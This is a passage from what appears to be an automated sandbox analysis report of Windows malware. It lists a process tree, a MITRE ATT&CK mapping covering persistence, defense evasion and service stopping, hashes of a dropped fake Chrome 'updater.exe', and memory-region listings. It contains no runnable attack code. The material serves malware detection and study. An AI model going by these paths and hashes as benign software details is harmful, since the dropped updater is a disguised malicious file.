                                                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                            1⤵
                                                                                                                                            • Drops file in System32 directory
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:324
                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
                                                                                                                                            1⤵
                                                                                                                                              PID:2444
                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                              1⤵
                                                                                                                                                PID:3960
                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 3960 -s 712
                                                                                                                                                  2⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:4532
                                                                                                                                              • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:2772
                                                                                                                                                • C:\Windows\System32\InstallAgent.exe
                                                                                                                                                  C:\Windows\System32\InstallAgent.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1492
                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                    1⤵
                                                                                                                                                      PID:920
                                                                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                                                                        C:\Windows\system32\WerFault.exe -u -p 920 -s 876
                                                                                                                                                        2⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:3512
                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                      C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                      1⤵
                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:4004
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                                                                      1⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:4852
                                                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3260
                                                                                                                                                      • C:\Windows\System32\mobsync.exe
                                                                                                                                                        C:\Windows\System32\mobsync.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:4032
                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k localservice -s W32Time
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3556
                                                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4140
                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 4140 -s 720
                                                                                                                                                              2⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:1752
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                            PID:1380

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                          Persistence

                                                                                                                                                          Create or Modify System Process

                                                                                                                                                          2
                                                                                                                                                          T1543

                                                                                                                                                          Windows Service

                                                                                                                                                          2
                                                                                                                                                          T1543.003

                                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                                          1
                                                                                                                                                          T1547

                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                          1
                                                                                                                                                          T1547.001

                                                                                                                                                          Privilege Escalation

                                                                                                                                                          Create or Modify System Process

                                                                                                                                                          2
                                                                                                                                                          T1543

                                                                                                                                                          Windows Service

                                                                                                                                                          2
                                                                                                                                                          T1543.003

                                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                                          1
                                                                                                                                                          T1547

                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                          1
                                                                                                                                                          T1547.001

                                                                                                                                                          Defense Evasion

                                                                                                                                                          Modify Registry

                                                                                                                                                          3
                                                                                                                                                          T1112

                                                                                                                                                          Impair Defenses

                                                                                                                                                          1
                                                                                                                                                          T1562

                                                                                                                                                          Discovery

                                                                                                                                                          Query Registry

                                                                                                                                                          5
                                                                                                                                                          T1012

                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                          2
                                                                                                                                                          T1120

                                                                                                                                                          System Information Discovery

                                                                                                                                                          5
                                                                                                                                                          T1082

                                                                                                                                                          Impact

                                                                                                                                                          Service Stop

                                                                                                                                                          1
                                                                                                                                                          T1489

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                            Filesize

                                                                                                                                                            2.8MB

                                                                                                                                                            MD5

                                                                                                                                                            eb27bb8cfa99d659e4fe023e9002ecd1

                                                                                                                                                            SHA1

                                                                                                                                                            c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                                                                                                                            SHA256

                                                                                                                                                            9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                                                                                                                            SHA512

                                                                                                                                                            ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                                                                                                                          • C:\Program Files\Google\Chrome\updater.exe
                                                                                                                                                            Filesize

                                                                                                                                                            2.8MB

                                                                                                                                                            MD5

                                                                                                                                                            eb27bb8cfa99d659e4fe023e9002ecd1

                                                                                                                                                            SHA1

                                                                                                                                                            c783400302fdfae0518269c5a5a8d4bad29f42a3

                                                                                                                                                            SHA256

                                                                                                                                                            9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                                                                                                                                                            SHA512

                                                                                                                                                            ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                                                                                                                                                          • C:\Program Files\Google\Libs\g.log
                                                                                                                                                            Filesize

                                                                                                                                                            226B

                                                                                                                                                            MD5

                                                                                                                                                            fdba80d4081c28c65e32fff246dc46cb

                                                                                                                                                            SHA1

                                                                                                                                                            74f809dedd1fc46a3a63ac9904c80f0b817b3686

                                                                                                                                                            SHA256

                                                                                                                                                            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                                                                                                                                                            SHA512

                                                                                                                                                            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Explorer.EXE_d933544bb1849471d20420de9b7ea63ee0261f_41822faa_cab_0b60408e\WER2F6A.tmp.appcompat.txt
                                                                                                                                                            Filesize

                                                                                                                                                            6KB

                                                                                                                                                            MD5

                                                                                                                                                            f46275f9c0b7d57378a712b3b5213b0c

                                                                                                                                                            SHA1

                                                                                                                                                            deabdaf020ce95f5f0edec43711719873975b44a

                                                                                                                                                            SHA256

                                                                                                                                                            523bbacd7e59ce4231693d2e486f2c2f551265328c7c8f2b178d3c5a7d2a20ae

                                                                                                                                                            SHA512

                                                                                                                                                            9747d174735fcbbfa8e1957f9b0760db7ffeb563b27e565db4fe54ad74bb83409b3ba5adce5a022fbe0a5b7d17b8ddc9eed231117fd6316e675082e354e7cf54

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER60F0.tmp.csv
                                                                                                                                                            Filesize

                                                                                                                                                            36KB

                                                                                                                                                            MD5

                                                                                                                                                            e7165f30f5eda53e9d028d6aa4d12e71

                                                                                                                                                            SHA1

                                                                                                                                                            703a2daed59860bdc14736acc907a0e543c12b71

                                                                                                                                                            SHA256

                                                                                                                                                            d5a75d2bb46e1b5dddfe8c9dec87f4953fc16c9a0dcdfffb722724bd334c44c7

                                                                                                                                                            SHA512

                                                                                                                                                            962c31ea380c264275bb36290eeafc2ce8352c85ce4263cf4adb27c4be5b5c4dc1057ce795f25c02fed1271fa266f0c9ac82dbed8385aecb5c6cca735af9fd51

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER6110.tmp.txt
                                                                                                                                                            Filesize

                                                                                                                                                            12KB

                                                                                                                                                            MD5

                                                                                                                                                            7c0f9c994e25fad4e18d15d4aa95df1b

                                                                                                                                                            SHA1

                                                                                                                                                            edf6c9628a280a2ad04e504ab877461cb5dc9f4c

                                                                                                                                                            SHA256

                                                                                                                                                            ea955e0df952c988e299b227fc21fea894bd1aa14c82d22a44470fa747c55782

                                                                                                                                                            SHA512

                                                                                                                                                            dc27ca03f4c60ae30398914f6e637d1910b43ba7f6c7fed017d56a1e682be8d6dd93114c6ea59c68846d903779501e5a84834b18d08842913fcb24f9fbe28bc7

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F2A.tmp.csv
                                                                                                                                                            Filesize

                                                                                                                                                            34KB

                                                                                                                                                            MD5

                                                                                                                                                            c1db28947dca743e673a49c2d291301e

                                                                                                                                                            SHA1

                                                                                                                                                            b4e25b684a2572e2584e82b8de62fe6ac4ec7b42

                                                                                                                                                            SHA256

                                                                                                                                                            a38e393a489cdd7570cc952abbad528f13d1587e54a90b3d016465c0d60e27b0

                                                                                                                                                            SHA512

                                                                                                                                                            3b393f39b0dda5315bddca03f692d6868c18ffc5e2244fd7bb6191d0db4743c6eba3fa260a7e0efb50dffe1249a4f53724b59780d8ad31558789bdeff5e8237f

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F6A.tmp.txt
                                                                                                                                                            Filesize

                                                                                                                                                            12KB

                                                                                                                                                            MD5

                                                                                                                                                            5a1798d2837293948fbe10df3498018c

                                                                                                                                                            SHA1

                                                                                                                                                            7d94f021162a643ef2c1bd507d28800e96a6ad3d

                                                                                                                                                            SHA256

                                                                                                                                                            3f695205ae5e6bfcd5499d60d496c8220b8a5f9812a4cd11e1a9d7f527008940

                                                                                                                                                            SHA512

                                                                                                                                                            fecc683c3dd88369cbcc28d2e4595991ceb919ef9c949d35acc6f62690c14d320dffa113fb5755a8a6eeddb51094246605def8828cb7725d6d38b0594f993be6

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D41.tmp.csv
                                                                                                                                                            Filesize

                                                                                                                                                            32KB

                                                                                                                                                            MD5

                                                                                                                                                            e6f39d27d00d6264aefd0e1b5e8a9190

                                                                                                                                                            SHA1

                                                                                                                                                            e4353bc4058ae1ce21127f94c7f67de3467f49c2

                                                                                                                                                            SHA256

                                                                                                                                                            3f5c436558e7ed1c22419b5b123c6289fea2c987dc0b44ef35f430f67e8b6bfc

                                                                                                                                                            SHA512

                                                                                                                                                            e3b416130bea861e54f5b0c756039588653861120a270e9c1f4f4cf7a8218d571a2c51a920418b3c30c1df07953e9e347647a6d495766306391a8890acacb6de

                                                                                                                                                          • C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D51.tmp.txt
                                                                                                                                                            Filesize

                                                                                                                                                            12KB

                                                                                                                                                            MD5

                                                                                                                                                            2c4e47e2bc06ce0099dda321f80f76a5

                                                                                                                                                            SHA1

                                                                                                                                                            0e8dd61cc8c4c5ecbe5176568398b79a98ecc072

                                                                                                                                                            SHA256

                                                                                                                                                            d394e9b536b218803494ea21000b4adc1d3f34f964fbeb2dc6aeb674a56bb131

                                                                                                                                                            SHA512

                                                                                                                                                            e5580a18338cf67a446121451d03d4708737884861184e3e57d5b636f98e03297f59141d2c71e9f490f3b879433aef41ededda1359cb724155e3252527266b0d

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                            Filesize

                                                                                                                                                            3KB

                                                                                                                                                            MD5

                                                                                                                                                            8592ba100a78835a6b94d5949e13dfc1

                                                                                                                                                            SHA1

                                                                                                                                                            63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                                                            SHA256

                                                                                                                                                            fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                                                            SHA512

                                                                                                                                                            87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            cb39828f3e88dcdef0a31af592b0f920

                                                                                                                                                            SHA1

                                                                                                                                                            e5fdb5a5180ccb3dd002f0e728a5e697a5bf7537

                                                                                                                                                            SHA256

                                                                                                                                                            5971d81c11931c6e38462e8022b9558d8baccb7e68cfbf114fc0103e3cc38a24

                                                                                                                                                            SHA512

                                                                                                                                                            b2040af92dd7016dcc46b7e65db6c28bd628d8a9ae7d75ab87cc77db5cfadf036330f2b965cc6220cc787012aa7cd7b4d9e18aa96ab17c426bbb7a40577da48b

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            ffdb23d094fdd84725ff2d6132661cf6

                                                                                                                                                            SHA1

                                                                                                                                                            e4671a15d914d4f8260c201523701cf119256fae

                                                                                                                                                            SHA256

                                                                                                                                                            1f2f343e2092b01c12852bbbe92e95d9d522ce09078e6cd5d261014d905232f3

                                                                                                                                                            SHA512

                                                                                                                                                            213aa076b2491abd9930c2d7dc54a7298c5f0ae75debf7520fa7ccf603a8d61a718e9e0f3ae45f056f7abf66316a1909a9d433fc43424f3d7d18e10d79187a13

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blwbsilr.tv2.ps1
                                                                                                                                                            Filesize

                                                                                                                                                            1B

                                                                                                                                                            MD5

                                                                                                                                                            c4ca4238a0b923820dcc509a6f75849b

                                                                                                                                                            SHA1

                                                                                                                                                            356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                                                            SHA256

                                                                                                                                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                                                            SHA512

                                                                                                                                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                            Filesize

                                                                                                                                                            3KB

                                                                                                                                                            MD5

                                                                                                                                                            ea6243fdb2bfcca2211884b0a21a0afc

                                                                                                                                                            SHA1

                                                                                                                                                            2eee5232ca6acc33c3e7de03900e890f4adf0f2f

                                                                                                                                                            SHA256

                                                                                                                                                            5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

                                                                                                                                                            SHA512

                                                                                                                                                            189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

                                                                                                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            065659124d9dd348476a53c4fb958bd6

                                                                                                                                                            SHA1

                                                                                                                                                            f183b5807a73a8334168849911c2101265172098

                                                                                                                                                            SHA256

                                                                                                                                                            0d5229666a881640e3dae3d737edb59eea7a475b2256233d237ba42b9f8aa91d

                                                                                                                                                            SHA512

                                                                                                                                                            b8a018c55303786c1836a97c9fcb9bedefe4e6502b660d05848421d82271944940e511616c746dc157c24c8fa5ba0de0addca37fcd39bf06473b6f185ccf04da

                                                                                                                                                          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            6293ef25ad920b9c7adf9da15f0e998d

                                                                                                                                                            SHA1

                                                                                                                                                            33910c56e5f2fb8e28521bfe770e1257f9ae72a2

                                                                                                                                                            SHA256

                                                                                                                                                            fcc663833fc7e9218dd65bd54ac93caadf5da3ecb8a8668656d2ee7fa793f2bc

                                                                                                                                                            SHA512

                                                                                                                                                            c10e21abadce6be50a19c2ada8063a19b6ce0cf7eb0c0214fafd7470ac6da395a4195c237308e6f9be8f0b07af4110fb8afe98f94abef0d2486c48c9f1f6cc50

                                                                                                                                                          • memory/68-243-0x000001C1A6450000-0x000001C1A647A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/68-244-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/164-59-0x00000269B4680000-0x00000269B4690000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/164-79-0x00000269B4680000-0x00000269B4690000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/164-94-0x00000269B4680000-0x00000269B4690000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/164-97-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/164-58-0x00000269B4680000-0x00000269B4690000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/164-56-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/412-251-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/412-247-0x0000027762A80000-0x0000027762AAA000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/592-214-0x00007FFFF2245000-0x00007FFFF2246000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/592-203-0x000001A2AFA80000-0x000001A2AFAA3000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            140KB

                                                                                                                                                          • memory/592-207-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/592-206-0x000001A2AFAB0000-0x000001A2AFADA000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/640-254-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/640-252-0x000002B30BAD0000-0x000002B30BAFA000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/644-208-0x00000218BC870000-0x00000218BC89A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/644-217-0x00000218BC870000-0x00000218BC89A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/644-213-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/744-221-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/744-220-0x0000015341E20000-0x0000015341E4A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/856-253-0x0000023B2F060000-0x0000023B2F08A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/856-257-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/856-258-0x0000023B2F060000-0x0000023B2F08A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/904-238-0x00000294DED00000-0x00000294DED2A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/904-232-0x00000294DED00000-0x00000294DED2A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/904-237-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/988-235-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/988-234-0x000001C047040000-0x000001C04706A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1096-261-0x00000298A8DF0000-0x00000298A8E1A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1096-264-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/1148-279-0x0000024645460000-0x000002464548A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1148-271-0x0000024645460000-0x000002464548A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1148-274-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/1188-277-0x00007FFFB2230000-0x00007FFFB2240000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/1188-275-0x000001E943090000-0x000001E9430BA000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1204-306-0x00000227C0930000-0x00000227C095A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1292-285-0x0000022FAA890000-0x0000022FAA8BA000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1344-290-0x000002A5F7640000-0x000002A5F766A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1352-295-0x000001D4FC3F0000-0x000001D4FC41A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/1456-301-0x0000026EB2120000-0x0000026EB214A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            168KB

                                                                                                                                                          • memory/2356-191-0x00007FFFEF940000-0x00007FFFEF9EE000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            696KB

                                                                                                                                                          • memory/2356-182-0x0000000140000000-0x0000000140042000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            264KB

                                                                                                                                                          • memory/2356-183-0x0000000140000000-0x0000000140042000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            264KB

                                                                                                                                                          • memory/2356-184-0x0000000140000000-0x0000000140042000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            264KB

                                                                                                                                                          • memory/2356-197-0x00007FFFF21A0000-0x00007FFFF237B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.9MB

                                                                                                                                                          • memory/2356-198-0x0000000140000000-0x0000000140042000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            264KB

                                                                                                                                                          • memory/2356-186-0x00007FFFF21A0000-0x00007FFFF237B000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.9MB

                                                                                                                                                          • memory/2560-210-0x00007FF7071F0000-0x00007FF7074B8000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            2.8MB

                                                                                                                                                          • memory/2804-118-0x00007FF752100000-0x00007FF752156000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            344KB

                                                                                                                                                          • memory/3912-11-0x00000189BB890000-0x00000189BB906000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            472KB

                                                                                                                                                          • memory/3912-24-0x00000189BB680000-0x00000189BB690000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/3912-47-0x00000189BB680000-0x00000189BB690000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/3912-6-0x00000189BB5B0000-0x00000189BB5D2000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/3912-51-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/3912-8-0x00000189BB680000-0x00000189BB690000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/3912-7-0x00000189BB680000-0x00000189BB690000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/3912-5-0x00007FFFD6490000-0x00007FFFD6E7C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/4240-169-0x00000000061E0000-0x0000000006202000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/4240-148-0x0000000005C70000-0x0000000005C80000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/4240-209-0x00000000073E0000-0x0000000007456000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            472KB

                                                                                                                                                          • memory/4240-187-0x0000000007090000-0x00000000070DB000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            300KB

                                                                                                                                                          • memory/4240-267-0x0000000073120000-0x000000007380E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            6.9MB

                                                                                                                                                          • memory/4240-172-0x0000000006C90000-0x0000000006FE0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            3.3MB

                                                                                                                                                          • memory/4240-171-0x0000000006A40000-0x0000000006AA6000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            408KB

                                                                                                                                                          • memory/4240-170-0x00000000069D0000-0x0000000006A36000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            408KB

                                                                                                                                                          • memory/4240-311-0x0000000005C70000-0x0000000005C80000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/4240-161-0x00000000062B0000-0x00000000068D8000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            6.2MB

                                                                                                                                                          • memory/4240-270-0x0000000005C70000-0x0000000005C80000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/4240-185-0x0000000007060000-0x000000000707C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            112KB

                                                                                                                                                          • memory/4240-163-0x0000000005C70000-0x0000000005C80000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/4240-145-0x0000000073120000-0x000000007380E000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            6.9MB

                                                                                                                                                          • memory/4240-147-0x0000000005C20000-0x0000000005C56000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            216KB

                                                                                                                                                          • memory/4276-142-0x000001BB4E8C0000-0x000001BB4E8D0000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            64KB

                                                                                                                                                          • memory/4276-180-0x00007FFFF21A0000-0x00007FFFF237B000-memory.dmp
